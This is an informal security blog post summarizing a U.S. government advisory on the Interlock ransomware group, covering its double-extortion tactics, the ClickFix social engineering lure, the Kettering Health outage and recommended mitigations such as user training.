Can a ransomware group be considered to have “made it to the big time” when a group of major U.S. governmental authorities issues a Cybersecurity Advisory on it? If so, Interlock has achieved a measure of fame—or is it infamy? 🚨
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC) released the advisory about Interlock in late July. They warn that immediate steps should be taken to minimize potential damage from the ransomware.
Interlock first started showing up in September 2024, going after businesses, as well as critical infrastructure like healthcare. In fact, Interlock caused a shutdown of services offered by Kettering Health in Ohio in May. The outage impacted call center operations and numerous patient care systems, and forced the cancellation of inpatient and outpatient procedures.
The outage was first reported on May 20, and normal operations weren’t restored until June, according to a Kettering website.
Interlock uses the popular (at least among ransomware actors) “double extortion” method, demanding a ransom twice:
1️⃣ To decrypt the files encrypted by the ransomware
2️⃣ To keep from making sensitive data public via a website.
“To date, Interlock actors have been observed encrypting VMs, leaving hosts, workstations, and physical servers unaffected; however, this does not mean they will not expand to these systems in the future,” CISA says in its advisory.
Interlock attacks Windows computers and FreeBSD, a version of Linux. It often uses the “ClickFix” method of social engineering. ClickFix will often present a fake error webpage with what appears to be a CAPTCHA authentication input window. The unaware user, thinking they are typing in a sequence to “verify” their identity or “fix” a problem, are instead sending a malicious command from the ransomware to the computer, fully compromising the machine.
In other words, game over. 🕹️💥
The CISA advisory recommends four steps to mitigate the threat of Interlock. They include taking steps like preventing initial breaches via DNS filtering and firewalls; ensuring systems are patched and up to date; using network segmentation to limit the damage; and using multi-factor authentication, or MFA.
These are all good recommendations, of course. Perhaps the most important step any organization can ultimately take is consistent, thorough, and verified user training about social engineering attacks. When ransomware variants like Interlock come on the scene, employees need to be taught about what to look for.
After all, nothing says “come and steal our stuff!” like an open front door. 🚪🔒